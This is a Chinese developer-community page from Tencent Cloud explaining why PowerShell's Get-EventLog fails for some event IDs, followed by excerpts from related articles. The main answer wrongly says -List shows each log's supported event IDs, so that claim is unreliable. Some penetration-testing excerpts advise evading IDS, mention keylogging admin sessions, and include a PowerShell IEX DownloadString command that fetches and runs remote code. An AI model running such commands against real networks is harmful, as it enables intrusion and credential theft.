开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

Powershell:无法使用Get-EventLog获取特定事件IDS的输出

Powershell是一种跨平台的脚本语言和命令行工具，用于自动化任务和配置管理。它是Windows操作系统中的一部分，可以通过命令行或脚本来管理和控制系统。

在Powershell中，Get-EventLog命令用于获取指定事件日志的事件记录。然而，有时候我们可能无法使用Get-EventLog命令获取特定事件ID的输出。这可能是由于以下几个原因：

事件ID不存在：首先，需要确保指定的事件ID确实存在于指定的事件日志中。可以使用Get-EventLog命令的-List参数来列出所有可用的事件日志和其支持的事件ID。
权限问题：如果当前用户没有足够的权限来访问指定的事件日志，那么Get-EventLog命令将无法获取输出。在这种情况下，可以尝试使用管理员权限运行Powershell或使用Start-Process命令以管理员身份运行Powershell。
事件日志源问题：有时候，特定事件ID的输出可能无法通过Get-EventLog命令获取，因为该事件ID是由特定的事件日志源生成的。在这种情况下，可以尝试使用Get-WinEvent命令来获取特定事件ID的输出。Get-WinEvent命令提供了更灵活和强大的功能来访问和查询事件日志。

综上所述，如果无法使用Get-EventLog命令获取特定事件ID的输出，可以尝试以下解决方法：确保事件ID存在于指定的事件日志中，检查权限问题，并尝试使用Get-WinEvent命令来获取输出。

腾讯云提供了一系列与云计算相关的产品和服务，包括云服务器、云数据库、云存储等。您可以访问腾讯云官方网站（https://cloud.tencent.com/）了解更多关于腾讯云的产品和服务信息。

相关搜索:仅使用Apps脚本获取特定日历事件的完整ID 使用eventID获取特定事件的Google Apps脚本日历使用Powershell中的TFS api获取特定项目的工作项使用Powershell获取与特定VPC关联的所有Cidr块使用powershell获取多个命令的输出并将其存储在一个简单的文件中使用powershell获取特定进程的CPU %使用UWP中的microsoft Graph API获取登录用户特定日期的会议邀请和事件使用美汤时无法获取特定的标签在浮点型上使用f字符串格式打印-无法获取输出的生成方式如何使用CURL获取特定时间段的repo的git事件？

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

PS命令之中系统日志相关信息查看与管理

[TOC] 系统日志查看与管理 Get-EventLog 命令 - 获取本地计算机或远程计算机上的事件日志或事件日志列表中的事件。...Tips: 在Windows Vista和更高版本的Windows中获取使用Windows事件日志技术的日志，请使用 “get WinEvent” cmdlet。...# - 4.从特定事件日志获取错误事件(Error)、失败事件(FailureAudit)、成功事件(SuccessAudit)、Information 、Warning Get-EventLog...# 47 Get-EventLog -LogName System -Message *description* # - 6.显示事件的属性值以及按属性获取事件和分组 $A = Get-EventLog...# - 8.使用源和事件ID从事件日志获取事件 Get-EventLog -LogName Application -Source Outlook | Where-Object {$_.EventID

5735 0

Get-WinEvent和Get-EventLog的区别及效率

Windows事件日志查看命令通常有2种：Get-WinEvent和Get-EventLog，那么二者之间的区别是什么？应用场景又是什么呢？...一、区别与联系联系就是二者都可以处理Windows事件日志，并且在本地执行时随便使用哪个命令都不影响输出结果内容，这里主要讨论区别： 1....image.png 二、执行效率对比这里我简单写了如下PowerShell脚本，用来测试Get-EventLog和Get-WinEvent加筛选条件下的执行效率。...测试Get-WinEvent,使用XML过滤（条件：最近1天内产生的Eventid=4625事件日志），耗时：269.49秒； 6....测试Get-WinEvent,使用XML过滤（条件：最近1天内产生的关键词为“审核失败”且Eventid=4625事件日志），耗时：263.30秒。

2.8K5 0

PowerShell 基础篇

-SourcePath ./ 使用帮助系统查找命令，例如想查找系统事件日志，却不知道使用哪个命令，可以运行以下命令 Help *log* Help *event* 或者使用Get-Command...最佳实践是总是指定参数名, 熟练以后再使用位置参数来节省时间 Cmdlet 的命名惯例,以标准的动词开始比如Get, Set, New, 或Pause powershell中的别名: 只是命令的一个昵称..., 无法包含任何参数使用快捷方式: 简化参数名称: powershell不要求输入完整的参数名称, 例如可以用-comp代替-ComputerName , 必须是唯一识别参数所需要输入的最少的部分....可以使用某个提供程序创建一个PSDrive, PSDrive可以通过一个特定的提供程序连接到某些存储数据的介质, 这和在windows资源管理器中类似, 本质上是创建一个驱动器映射, 但是由于PSDrive...New-Item, 并指定ItemType为directory powershell 可以使用?

1.7K1 0

深入理解Windows中的Get-WinEvent命令

对于系统管理员和开发者来说，PowerShell是一种强大的工具，可以用于管理和自动化任务。在本篇文章中，我们将专注于其中一个特定的命令：Get-WinEvent。...Get-WinEvent 是PowerShell中的一个cmdlet，用于获取Windows事件日志中的事件。...与它类似的命令还有Get-EventLog，但Get-WinEvent提供了更多的功能，包括对远程计算机的支持、对事件追踪日志的支持，以及更高效的日志过滤。如何使用Get-WinEvent命令？...下面是一些基本的用法示例：获取所有事件： Get-WinEvent 注意，因为事件日志可能包含大量的数据，所以这个命令可能需要一些时间才能完成。...获取特定日志的事件： Get-WinEvent -LogName Application 这个命令将获取"Application"日志中的3个事件。

6111 0

ElasticStack日志采集监控搭建实践案例

Windows PowerShell Step 5.保存配置文件后，使用以下命令对其进行测试,并Winlogbeat加载附带用于解析、索引和可视化数据的预定义资产。...（只应在测试实验功能时设置此选项） tags: [forwarded] # - 标记使得在Kibana中选择特定事件或Logstash中的applyconditional过滤变得容易标记将被附加到常规配置中指定的标签列表中...event_id: 400, 403, 600, -800, # - 包含和排除（阻止）事件ID的列表, 排除事件ID为800的事件 - name: Microsoft-Windows-PowerShell...（对于elasticsearch输出），或设置raw_index事件的元数据字段（用于其他输出） keep_null: true # 如果此选项设置为true，则字段null值将在输出文档中发布...Tips : 如果指定的事件ID超过22个要包含或排除的事件ID超过22个，Windows将阻止Winlogbeat读取事件日志，因为它限制了事件日志查询中可以使用的条件数。

1.9K2 0

PowerShell 拿到最近的10个系统日志

我最近发现我的程序总是调用一些不清真的代码，于是在运行的时候就退出了，我想要拿到系统的日志知道我的程序是怎么退出的，我如何通过 PowerShell 拿到最近的10个系统日志。...为什么需要拿到最新10个日志，因为在我程序退出的时候可能也有其他的几个程序也退出了，我的输入又很慢，所以我就需要这样写在 PowerShell 只需要一条命令就可以拿到最近的 10 个系统日志里面的应用程序日志...Get-EventLog application -newest 10 | Format-List EventID,EntryType,TimeGenerated,Message,Source 运行的时候大概的输出是这样...Information TimeGenerated : 2019/4/29 10:38:55 Message : 故障存储段 125730739576，类型 5 事件名称...\C:\Users\lindexi\AppData\Local\Temp\WER84F3.tmp.WERDataCollectionStatus.txt 可在此处获取这些文件

3213 0

传统.NET 4.x应用容器化体验（6）

1 关于Windows事件日志在以往基于IIS部署ASP.NET应用程序时，如果没有写指定日志的情况下，我们往往会使用Window事件日志来查看一些错误信息。...虽然事件日志的可读性和易用性不够好，但是还是可以帮助我们查看一些问题。...2 Docker下查看事件日志 Step1. 首先进入ASP.NET MVC容器实例内部： >docker exec -it powershell Step2....获取最新的20个事件日志，获得对应日志的Index： >Get-Eventlog -newest 20 application Index Time EntryType Source...从错误日志中可以看到，Config目录访问不到，经过调查发现，原来已有系统的IIS目录下有一个手动拷贝进去的Config目录（正确做法应该将其作为解决方案的一部分内容始终输出到release目录），于是乎将其拷贝到容器目录下

2182 0

通过Windows事件日志介绍APT-Hunter

APT-Hunter具有两个部分，它们可以一起工作以帮助用户快速获取所需的数据。该工具将用于加快Windows日志分析的速度，但永远不会取代深度日志分析。...使用安全日志检测可疑的枚举用户或组的尝试使用Powershell操作日志检测Powershell操作（包括TEMP文件夹）使用Powershell操作日志使用多个事件ID检测可疑的Powershell...命令使用Powershell日志使用多个事件ID检测可疑的Powershell命令使用终端服务日志从袜子代理检测连接的RDP 使用终端服务日志从公共IP检测连接的RDP 从计算机Powershell...使用安全日志检测可运行的可执行文件使用安全日志检测可疑的Powershell命令使用安全日志检测通过管理界面创建的用户使用安全日志检测Windows关闭事件使用安全日志检测添加到本地组的用户...Defender使用Windows Defender日志对恶意软件采取了措施检测Windows Defender无法使用Windows Defender日志对恶意软件采取措施使用Windows Defender

1.4K2 0

实用powershell命令

6F5FF66C-6775-42B0-86C4-47D41F2DA187/Win7AndW2K8R2-KB3191566-x64.zip image.png 解压后在Install-WMF5.1.ps1上右击“使用...PowerShell运行”，安装完成后重启生效，重启后原本PowerShell的图标会变，执行Install-WMF5.1.ps1前首先要运行powershell开启下“允许执行脚本”，命令是set-ExecutionPolicy...$PSVersionTable image.png 以下都是特别有用的powershell常用命令【获取日志】 Get-EventLog -LogName security //安全相关 Get-WinEvent...//获取某个文件的Hash值（算法SHA256） Get-WMIObject win32_Processor //获取CPU信息 Get-WmiObject Win32_VideoController...//获取显卡信息【获取Windows产品ID】 2种方式第一种：CMD命令行运行control system查看产品ID image.png 第二种：CMD命令行运行powershell，输入命令查看

2.6K3 0

漏洞情报｜微软Exchange多个高危漏洞风险通告

如果攻击者可以通过Exchange服务器的身份验证，则他们可以使用此漏洞将文件写入服务器上的任何路径。...使用此缓解措施仅能防御攻击的初始部分。如果攻击者已经具有访问权限或欺骗管理员打开恶意文件，则可以触发攻击链的其他部分。...AnchorMailbox路径中指定的特定于应用程序的日志来帮助确定采取了哪些操作。...Message Contains: System.InvalidCastException 或者可通过类似以下PowerShell命令，在应用程序事件日志中查询这些日志条目： Get-EventLog...云鼎实验室互动星球一个多元的科技社交圈 -扫码关注我们- ? 关注云鼎实验室，获取更多安全情报 ?

5451 0

Windows PowerShell：（

启动一个已停止的服务。 • Stop-Service。停止一个正在运行的服务。 • Suspend-Service。挂起一个服务。 2、日志 • Get-EventLog。...显示某个事件日志里的事件。 • Clear-EventLog。删除某个事件日志里的所有记录。 • Limit-EventLog。设置事件日志的区间和文件大小限制。 • New-EventLog。...在运行Windows Server的计算机上创建一个新的事件日志和事件源。 • Remove-EventLog。删除一个自定义的事件日志，并将此事件日志的所有的事件源删除注册。...建议使用可用于服务器管理器的 Windows PowerShell cmdlet。用法: ServerManagerCmd.exe 安装和删除角色、角色服务和功能。...也显示所有可用的角色、角色服务和功能列表，并显示在此计算机上安装了其中哪些内容。有关可以使用此工具指定的角色、角色服务和功能的详细信息，请参阅服务器管理器的“帮助”。

3.1K3 0

调大动态端口范围解决tcpip告警

机器内外网出不去，其他异常没发现，事件查看器发现有tcp/ip来源的日志若干条调大动态端口范围解决tcpip告警事件ID4227:EVENT_TCPIP_TCP_TIME_WAIT_COLLISION...Powershell过滤： Get-EventLog -LogName System -Source Tcpip |Where-Object {$_.EventID -eq "4227" -or $_...EventID -eq "4231" -or $_.EventID -eq "4266"} |FT TimeGenerated,EventID,EntryType,Source,Message TCP/IP 无法建立传出连接...当以高速率打开和关闭传出连接时，会导致所有可用的本地端口被使用，并迫使 TCP/IP 重新使用本地端口进行传出连接，此时通常会产生这种错误。...为了最大限度地降低数据受到损坏的风险，在给定的本地终结点和给定的远程终结点之间的连续连接中， TCP/IP 标准需要等待一段最短的时间段。

2.1K2 0

常规安全检查阶段 | Windows 应急响应

/q:"Event/System/EventID=4624" 筛选事件id为4624的日志 /f 输出格式一般有xml、text等 /f:text text格式输出 /c 理解为输出的条数默认为倒序所以直接输出都是最早的日志...可以获取指定日志名称的事件日志条目常见用法示例：Get-EventLog -LogName System Get-WinEvent https://learn.microsoft.com/zh-cn...Log Service）与事件日志交互提供更丰富的选项，例如条件过滤、排序、格式化等可以使用强大的筛选器来选择特定的事件日志条目常见用法示例：Get-WinEvent -LogName System...事件ID 7：图像已加载图像加载事件记录在特定过程中加载模块的时间。默认情况下，此事件是禁用的，需要使用–l选项进行配置。它指示模块的加载过程，哈希和签名信息。...这有助于防止使用容易猜测的密码，如123456、password等。自定义验证规则：管理员可以定义自定义验证规则，以满足特定的安全需求。例如，要求密码包含特定字符、不允许使用特定单词或模式等。

6551 0

用FullEventLogView分析日志

FullEventLogView比eventvwr的优势就不赘言了http://www.nirsoft.net/utils/full_event_log_view.html说下使用技巧外部机器.evtx...png图片.png图片.png扩展：端口耗尽、tcpip相关日志4227,4231,4266开关机相关的事件ID12,13,6005,6006,6008,41,1074 ProviderName:Microsoft-Windows-User...Profiles Service1530,1531,1532ProviderName:Windows Error Reporting1001激活相关的事件ID8197,8198,12288,12289...这样过滤（一般来说用事件ID过滤效率高，过滤得快，如果用description里的字符串过滤，效率会差一些，过滤得慢）图片或者图片图片powershell命令过滤日志举例：tcpip来源的日志4227,4231,4266...（如过滤到，则需要放大tcp动态端口范围、缩短timewait回收时间）Get-EventLog -LogName System -Source Tcpip -ErrorAction SilentlyContinue

2.7K5 1

内网渗透测试定位技术总结

工具常用工具：Dsquery/Dsget，Ldifde，Csvde，Adexplorer，Adfind，wmi，powershell… 注：控制扫描的频率和速度，可以大大降低触发IDS的风险，针对windows...机器，可以考虑用wmi脚本和powershell脚本进行扫描，低频扫描可以很容易的绕过IDS的规则，同时可以考虑使用内网管理工具使用的相同协议进行扫描探测。...机器，可以考虑用wmi脚本和powershell脚本进行扫描，低频扫描可以很容易的绕过IDS的规则。...比如说：我们使用这些功能来找Linux管理员组和其相关的成员，就可以追踪和键盘记录他们的putty/ssh会话。 Invoke-UserHunter 功能可以找到域内特定用户群。...Get-UserLogonEvents cmdlet可以查询查询登录事件（如：ID 4624）远程主机，Invoke-UserEventHunter 查询特定用户在域控上面的登陆日志，需要域管理权限。

1.7K3 0

Windows PowerShell 实战指南-动手实验-15.11

任务1：创建一次性的后台作业来寻找C:驱动器中所有的Powershell脚本。...Invoke-Command -Command {dir *.ps1 -Recurse} -ComputerName (Get-Content allservers.txt) -AsJob 任务3：传建一个后台作业来获取计算机系统时间日志中最近的...解答： Register-ScheduledJob -Name eventlog2 -ScriptBlock { Start-Job -ScriptBlock { Get-EventLog -LogName...Wednesday,Friday -At 6am) -ScheduledJobOption (New-ScheduledJobOption -WakeToRun -RunElevated) 任务4：你为使用什么...Cmdlet来获取一个作业的结果，然后在作业队列中如何存放这些结果呢？

5001 0

PS对象处理操作常用命令

foreach循环使用Get-Member cmdlet获取From对象的每个属性。...Tips ：为了获得关于静态成员的信息，类的成员（而不是实例的成员）使用static参数，要仅获取某些类型的成员如(NoteProperties)请使用MemberType参数。...Static : 获取成员的静态方法 View ：仅获取特定类型的属性和方法，指定一个或多个值。...Adapted : 仅获取在PowerShell扩展类型系统中定义的属性和方法。 Base : 仅获取.NET对象的原始属性和方法（没有扩展或调整）。...，因为Out-Host 直接写入 PowerShell 主机，但它不会为管道生成基于对象的输出。

9.6K1 0

tcpip来源事件ID 422742314266 调大动态端口范围

端口耗尽、端口释放频率赶不上端口请求频率的情况下才会报这个，重启机器能解决问题，不重启执行扩大动态端口范围的命令也能解决当系统出现这些典型报错和 4227/4231/4266等事件ID时，此时用户态的...，下图2个值分别是起点端口和端口数，端口范围是【49152,65535】以管理员身份在powershell执行Get-EventLog -LogName System -Source Tcpip -...看到的多少。...这是我曾经咨询微软时的一个答复 netstat -ano看到端口不多的疑问，是因为netstat看到的是user-mode的端口，可能在kernel-mode中AFD的端口已经耗尽，TCP/IP已经无法申请了...wevtutil epl System c:\system.evtx wevtutil epl Application c:\app.evtx netstat -anbo > c:\netstat.txt powershell.exe

3.5K9 0

【漏洞通告】微软Exchange多个高危漏洞

Exchange Server 2019 Exchange Server 2016 Exchange Server 2013 Exchange Server 2010 3漏洞检测 3.1 本地扫描用户可使用官方团队提供的...-and $_.AnchorMailbox -like ‘ServerInfo~*/*’ } | select DateTime, AnchorMailbox 如果检测到了入侵，可以通过以下目录获取攻击者进行了哪些操作...： %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging CVE-2021-26857：可利用以下命令在应用程序事件中查询日志条目，并检查是否受到攻击...Get-EventLog -LogName Application -Source “MSExchange Unified Messaging” -EntryType Error | Where-Object...由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，绿盟科技以及安全公告作者不为此承担任何责任。

9271 0

内网渗透基石篇—信息收集（下）

四、定位域管理员内网渗透测试的需求是，获取内网中特定用户或机器的权限，进而获得特定的资源，对内网的安全性进行评估。...1 域管理员定位概述在内网中，通常会部署大量的网络安全系统和设备，例如IDS、IPS、日志审计、安全网关、反病毒软件等。在域网络攻击测试中，获取域内的一个支点后，需要获取域管理员权限。...Invoke-UserHunter #获取域用户登陆的计算机信息，以及该用户是否有本地管理员权限 ? Invoke-ProcessHunter #通过查询域内所有的机器进程找到特定用户 ?...\test.txt" # 使用修改组策略的方式限制登录 powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com...为Windows 事件命令行实用程序，其导出的日志为evtx格式（即Windows日志本身的存储格式），可以使用Windows事件查看器分析，Crtl+F查找，或者不使用epl参数，直接重定向输出即可。

1.7K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭